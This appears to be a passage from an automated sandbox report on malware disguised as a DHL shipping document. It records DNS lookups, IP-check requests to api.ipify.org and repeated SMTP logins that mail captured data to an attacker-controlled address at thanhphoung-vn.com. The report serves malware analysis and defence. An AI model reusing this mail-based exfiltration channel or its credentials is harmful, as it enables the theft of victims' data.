                                                                                                                                            Mar 20, 2023 11:34:26.834669113 CET8.8.8.8192.168.2.30x706fNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.834669113 CET8.8.8.8192.168.2.30x706fNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.834669113 CET8.8.8.8192.168.2.30x706fNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.834669113 CET8.8.8.8192.168.2.30x706fNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:26.834669113 CET8.8.8.8192.168.2.30x706fNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:30.205163956 CET8.8.8.8192.168.2.30x77bdNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:30.205163956 CET8.8.8.8192.168.2.30x77bdNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:30.205163956 CET8.8.8.8192.168.2.30x77bdNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:30.205163956 CET8.8.8.8192.168.2.30x77bdNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:30.265024900 CET8.8.8.8192.168.2.30x687fNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:30.265024900 CET8.8.8.8192.168.2.30x687fNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:30.265024900 CET8.8.8.8192.168.2.30x687fNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:30.265024900 CET8.8.8.8192.168.2.30x687fNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:48.991746902 CET8.8.8.8192.168.2.30x1893No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:48.991746902 CET8.8.8.8192.168.2.30x1893No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:48.991746902 CET8.8.8.8192.168.2.30x1893No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:48.991746902 CET8.8.8.8192.168.2.30x1893No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:49.025790930 CET8.8.8.8192.168.2.30x92beNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:49.025790930 CET8.8.8.8192.168.2.30x92beNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:49.025790930 CET8.8.8.8192.168.2.30x92beNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:34:49.025790930 CET8.8.8.8192.168.2.30x92beNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:07.866302967 CET8.8.8.8192.168.2.30xef2dNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:07.866302967 CET8.8.8.8192.168.2.30xef2dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:07.866302967 CET8.8.8.8192.168.2.30xef2dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:07.866302967 CET8.8.8.8192.168.2.30xef2dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:07.866302967 CET8.8.8.8192.168.2.30xef2dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:08.107903004 CET8.8.8.8192.168.2.30xe3adNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:08.107903004 CET8.8.8.8192.168.2.30xe3adNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:08.107903004 CET8.8.8.8192.168.2.30xe3adNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:08.107903004 CET8.8.8.8192.168.2.30xe3adNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:08.107903004 CET8.8.8.8192.168.2.30xe3adNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.543288946 CET8.8.8.8192.168.2.30xef58No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.543288946 CET8.8.8.8192.168.2.30xef58No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.543288946 CET8.8.8.8192.168.2.30xef58No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.543288946 CET8.8.8.8192.168.2.30xef58No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.543288946 CET8.8.8.8192.168.2.30xef58No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.568840981 CET8.8.8.8192.168.2.30xa756No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.568840981 CET8.8.8.8192.168.2.30xa756No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.568840981 CET8.8.8.8192.168.2.30xa756No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.568840981 CET8.8.8.8192.168.2.30xa756No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:11.568840981 CET8.8.8.8192.168.2.30xa756No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.366147041 CET8.8.8.8192.168.2.30xcf7dNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.366147041 CET8.8.8.8192.168.2.30xcf7dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.366147041 CET8.8.8.8192.168.2.30xcf7dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.366147041 CET8.8.8.8192.168.2.30xcf7dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.366147041 CET8.8.8.8192.168.2.30xcf7dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.389741898 CET8.8.8.8192.168.2.30x950cNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.389741898 CET8.8.8.8192.168.2.30x950cNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.389741898 CET8.8.8.8192.168.2.30x950cNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.389741898 CET8.8.8.8192.168.2.30x950cNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.389741898 CET8.8.8.8192.168.2.30x950cNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.704447031 CET8.8.8.8192.168.2.30x2a52No error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.704447031 CET8.8.8.8192.168.2.30x2a52No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.704447031 CET8.8.8.8192.168.2.30x2a52No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.704447031 CET8.8.8.8192.168.2.30x2a52No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.704447031 CET8.8.8.8192.168.2.30x2a52No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.891561985 CET8.8.8.8192.168.2.30xa55dNo error (0)smtp.thanhphoung-vn.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.891561985 CET8.8.8.8192.168.2.30xa55dNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.891561985 CET8.8.8.8192.168.2.30xa55dNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.891561985 CET8.8.8.8192.168.2.30xa55dNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:13.891561985 CET8.8.8.8192.168.2.30xa55dNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Mar 20, 2023 11:35:18.463351011 CET8.8.8.8192.168.2.30x10dcName error (3)203.215.12.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • api.ipify.org

                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.349697173.231.16.76443C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            2023-03-20 10:34:05 UTC0OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                            Host: api.ipify.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2023-03-20 10:34:05 UTC0INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 10
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Date: Mon, 20 Mar 2023 10:34:05 GMT
                                                                                                                                            Vary: Origin
                                                                                                                                            Connection: close
                                                                                                                                            2023-03-20 10:34:05 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 39
                                                                                                                                            Data Ascii: 84.17.52.9


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            1192.168.2.349700104.237.62.211443C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            2023-03-20 10:34:31 UTC0OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                            Host: api.ipify.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2023-03-20 10:34:31 UTC0INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 10
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Date: Mon, 20 Mar 2023 10:34:31 GMT
                                                                                                                                            Vary: Origin
                                                                                                                                            Connection: close
                                                                                                                                            2023-03-20 10:34:31 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 39
                                                                                                                                            Data Ascii: 84.17.52.9


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            2192.168.2.349701173.231.16.76443C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            2023-03-20 10:34:50 UTC0OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                            Host: api.ipify.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2023-03-20 10:34:50 UTC0INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 10
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Date: Mon, 20 Mar 2023 10:34:50 GMT
                                                                                                                                            Vary: Origin
                                                                                                                                            Connection: close
                                                                                                                                            2023-03-20 10:34:50 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 39
                                                                                                                                            Data Ascii: 84.17.52.9


                                                                                                                                            SMTP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                            Mar 20, 2023 11:34:22.878103971 CET58749698208.91.199.223192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Mar 20, 2023 11:34:22.878870964 CET49698587192.168.2.3208.91.199.223EHLO 841675
                                                                                                                                            Mar 20, 2023 11:34:23.063883066 CET58749698208.91.199.223192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Mar 20, 2023 11:34:23.065187931 CET49698587192.168.2.3208.91.199.223AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                                                            Mar 20, 2023 11:34:23.258714914 CET58749698208.91.199.223192.168.2.3334 UGFzc3dvcmQ6
                                                                                                                                            Mar 20, 2023 11:34:23.451380968 CET58749698208.91.199.223192.168.2.3235 2.7.0 Authentication successful
                                                                                                                                            Mar 20, 2023 11:34:23.451690912 CET49698587192.168.2.3208.91.199.223MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:34:23.637947083 CET58749698208.91.199.223192.168.2.3250 2.1.0 Ok
                                                                                                                                            Mar 20, 2023 11:34:23.638286114 CET49698587192.168.2.3208.91.199.223RCPT TO:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:34:23.848236084 CET58749698208.91.199.223192.168.2.3250 2.1.5 Ok
                                                                                                                                            Mar 20, 2023 11:34:23.851207018 CET49698587192.168.2.3208.91.199.223DATA
                                                                                                                                            Mar 20, 2023 11:34:24.037393093 CET58749698208.91.199.223192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                                                            Mar 20, 2023 11:34:24.041614056 CET49698587192.168.2.3208.91.199.223.
                                                                                                                                            Mar 20, 2023 11:34:24.360294104 CET58749698208.91.199.223192.168.2.3250 2.0.0 Ok: queued as B89A45008EF
                                                                                                                                            Mar 20, 2023 11:34:26.123390913 CET49698587192.168.2.3208.91.199.223QUIT
                                                                                                                                            Mar 20, 2023 11:34:26.309504032 CET58749698208.91.199.223192.168.2.3221 2.0.0 Bye
                                                                                                                                            Mar 20, 2023 11:34:27.325263977 CET58749699208.91.199.225192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Mar 20, 2023 11:34:27.325484037 CET49699587192.168.2.3208.91.199.225EHLO 841675
                                                                                                                                            Mar 20, 2023 11:34:27.510591030 CET58749699208.91.199.225192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Mar 20, 2023 11:34:27.510909081 CET49699587192.168.2.3208.91.199.225AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                                                            Mar 20, 2023 11:34:27.698324919 CET58749699208.91.199.225192.168.2.3334 UGFzc3dvcmQ6
                                                                                                                                            Mar 20, 2023 11:34:27.889137983 CET58749699208.91.199.225192.168.2.3235 2.7.0 Authentication successful
                                                                                                                                            Mar 20, 2023 11:34:27.889378071 CET49699587192.168.2.3208.91.199.225MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:34:28.078640938 CET58749699208.91.199.225192.168.2.3250 2.1.0 Ok
                                                                                                                                            Mar 20, 2023 11:34:28.078994036 CET49699587192.168.2.3208.91.199.225RCPT TO:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:34:28.289134026 CET58749699208.91.199.225192.168.2.3250 2.1.5 Ok
                                                                                                                                            Mar 20, 2023 11:34:28.289359093 CET49699587192.168.2.3208.91.199.225DATA
                                                                                                                                            Mar 20, 2023 11:34:28.475245953 CET58749699208.91.199.225192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                                                            Mar 20, 2023 11:34:28.488766909 CET49699587192.168.2.3208.91.199.225.
                                                                                                                                            Mar 20, 2023 11:34:28.828916073 CET58749699208.91.199.225192.168.2.3250 2.0.0 Ok: queued as 305DC6406B1
                                                                                                                                            Mar 20, 2023 11:35:11.590221882 CET58749702208.91.198.143192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Mar 20, 2023 11:35:11.592853069 CET49702587192.168.2.3208.91.198.143EHLO 841675
                                                                                                                                            Mar 20, 2023 11:35:11.776196957 CET58749702208.91.198.143192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Mar 20, 2023 11:35:11.776474953 CET49702587192.168.2.3208.91.198.143AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                                                            Mar 20, 2023 11:35:11.959743023 CET58749703208.91.199.225192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Mar 20, 2023 11:35:11.959975958 CET49703587192.168.2.3208.91.199.225EHLO 841675
                                                                                                                                            Mar 20, 2023 11:35:11.962838888 CET58749702208.91.198.143192.168.2.3334 UGFzc3dvcmQ6
                                                                                                                                            Mar 20, 2023 11:35:12.145034075 CET58749703208.91.199.225192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Mar 20, 2023 11:35:12.145421028 CET49703587192.168.2.3208.91.199.225AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                                                            Mar 20, 2023 11:35:12.151539087 CET58749702208.91.198.143192.168.2.3235 2.7.0 Authentication successful
                                                                                                                                            Mar 20, 2023 11:35:12.151762009 CET49702587192.168.2.3208.91.198.143MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:35:12.333383083 CET58749703208.91.199.225192.168.2.3334 UGFzc3dvcmQ6
                                                                                                                                            Mar 20, 2023 11:35:12.336483002 CET58749702208.91.198.143192.168.2.3250 2.1.0 Ok
                                                                                                                                            Mar 20, 2023 11:35:12.336699009 CET49702587192.168.2.3208.91.198.143RCPT TO:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:35:12.524157047 CET58749703208.91.199.225192.168.2.3235 2.7.0 Authentication successful
                                                                                                                                            Mar 20, 2023 11:35:12.524444103 CET49703587192.168.2.3208.91.199.225MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:35:12.550317049 CET58749702208.91.198.143192.168.2.3250 2.1.5 Ok
                                                                                                                                            Mar 20, 2023 11:35:12.550538063 CET49702587192.168.2.3208.91.198.143DATA
                                                                                                                                            Mar 20, 2023 11:35:12.711761951 CET58749703208.91.199.225192.168.2.3250 2.1.0 Ok
                                                                                                                                            Mar 20, 2023 11:35:12.712461948 CET49703587192.168.2.3208.91.199.225RCPT TO:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:35:12.734956026 CET58749702208.91.198.143192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                                                            Mar 20, 2023 11:35:12.738570929 CET49702587192.168.2.3208.91.198.143.
                                                                                                                                            Mar 20, 2023 11:35:12.924285889 CET58749703208.91.199.225192.168.2.3250 2.1.5 Ok
                                                                                                                                            Mar 20, 2023 11:35:12.925528049 CET49703587192.168.2.3208.91.199.225DATA
                                                                                                                                            Mar 20, 2023 11:35:13.058434963 CET58749702208.91.198.143192.168.2.3250 2.0.0 Ok: queued as 6FC36B80651
                                                                                                                                            Mar 20, 2023 11:35:13.112901926 CET58749703208.91.199.225192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                                                            Mar 20, 2023 11:35:13.114183903 CET49703587192.168.2.3208.91.199.225.
                                                                                                                                            Mar 20, 2023 11:35:13.154227018 CET49702587192.168.2.3208.91.198.143QUIT
                                                                                                                                            Mar 20, 2023 11:35:13.337726116 CET58749702208.91.198.143192.168.2.3221 2.0.0 Bye
                                                                                                                                            Mar 20, 2023 11:35:13.430918932 CET58749703208.91.199.225192.168.2.3250 2.0.0 Ok: queued as CB6BF640918
                                                                                                                                            Mar 20, 2023 11:35:13.490976095 CET49703587192.168.2.3208.91.199.225QUIT
                                                                                                                                            Mar 20, 2023 11:35:13.676893950 CET58749703208.91.199.225192.168.2.3221 2.0.0 Bye
                                                                                                                                            Mar 20, 2023 11:35:13.761910915 CET58749704208.91.198.143192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Mar 20, 2023 11:35:13.762095928 CET49704587192.168.2.3208.91.198.143EHLO 841675
                                                                                                                                            Mar 20, 2023 11:35:13.944767952 CET58749704208.91.198.143192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Mar 20, 2023 11:35:13.945008039 CET49704587192.168.2.3208.91.198.143AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                                                            Mar 20, 2023 11:35:14.130177021 CET58749704208.91.198.143192.168.2.3334 UGFzc3dvcmQ6
                                                                                                                                            Mar 20, 2023 11:35:14.270006895 CET58749705208.91.199.223192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                                            Mar 20, 2023 11:35:14.311436892 CET49705587192.168.2.3208.91.199.223EHLO 841675
                                                                                                                                            Mar 20, 2023 11:35:14.318630934 CET58749704208.91.198.143192.168.2.3235 2.7.0 Authentication successful
                                                                                                                                            Mar 20, 2023 11:35:14.318866014 CET49704587192.168.2.3208.91.198.143MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:35:14.496598005 CET58749705208.91.199.223192.168.2.3250-us2.outbound.mailhostbox.com
                                                                                                                                            250-PIPELINING
                                                                                                                                            250-SIZE 41648128
                                                                                                                                            250-VRFY
                                                                                                                                            250-ETRN
                                                                                                                                            250-STARTTLS
                                                                                                                                            250-AUTH PLAIN LOGIN
                                                                                                                                            250-AUTH=PLAIN LOGIN
                                                                                                                                            250-ENHANCEDSTATUSCODES
                                                                                                                                            250-8BITMIME
                                                                                                                                            250-DSN
                                                                                                                                            250 CHUNKING
                                                                                                                                            Mar 20, 2023 11:35:14.496830940 CET49705587192.168.2.3208.91.199.223AUTH login bG9nQHRoYW5ocGhvdW5nLXZuLmNvbQ==
                                                                                                                                            Mar 20, 2023 11:35:14.502434969 CET58749704208.91.198.143192.168.2.3250 2.1.0 Ok
                                                                                                                                            Mar 20, 2023 11:35:14.502640009 CET49704587192.168.2.3208.91.198.143RCPT TO:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:35:14.684770107 CET58749705208.91.199.223192.168.2.3334 UGFzc3dvcmQ6
                                                                                                                                            Mar 20, 2023 11:35:14.713077068 CET58749704208.91.198.143192.168.2.3250 2.1.5 Ok
                                                                                                                                            Mar 20, 2023 11:35:14.713208914 CET49704587192.168.2.3208.91.198.143DATA
                                                                                                                                            Mar 20, 2023 11:35:14.876605034 CET58749705208.91.199.223192.168.2.3235 2.7.0 Authentication successful
                                                                                                                                            Mar 20, 2023 11:35:14.876791954 CET49705587192.168.2.3208.91.199.223MAIL FROM:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:35:14.896744013 CET58749704208.91.198.143192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                                                            Mar 20, 2023 11:35:14.897586107 CET49704587192.168.2.3208.91.198.143.
                                                                                                                                            Mar 20, 2023 11:35:15.063580990 CET58749705208.91.199.223192.168.2.3250 2.1.0 Ok
                                                                                                                                            Mar 20, 2023 11:35:15.063796043 CET49705587192.168.2.3208.91.199.223RCPT TO:<log@thanhphoung-vn.com>
                                                                                                                                            Mar 20, 2023 11:35:15.202651978 CET58749704208.91.198.143192.168.2.3250 2.0.0 Ok: queued as 97D10B80646
                                                                                                                                            Mar 20, 2023 11:35:15.275104046 CET58749705208.91.199.223192.168.2.3250 2.1.5 Ok
                                                                                                                                            Mar 20, 2023 11:35:15.644530058 CET49705587192.168.2.3208.91.199.223DATA
                                                                                                                                            Mar 20, 2023 11:35:15.831379890 CET58749705208.91.199.223192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                                                                                            Mar 20, 2023 11:35:15.832109928 CET49705587192.168.2.3208.91.199.223.
                                                                                                                                            Mar 20, 2023 11:35:16.150226116 CET58749705208.91.199.223192.168.2.3250 2.0.0 Ok: queued as 2CAA9500950

                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:11:33:05
                                                                                                                                            Start date:20/03/2023
                                                                                                                                            Path:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                                                            Imagebase:0x19909b90000
                                                                                                                                            File size:2802176 bytes
                                                                                                                                            MD5 hash:E2F0B0AFE1D1CABE6D0FC082FADDE43F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
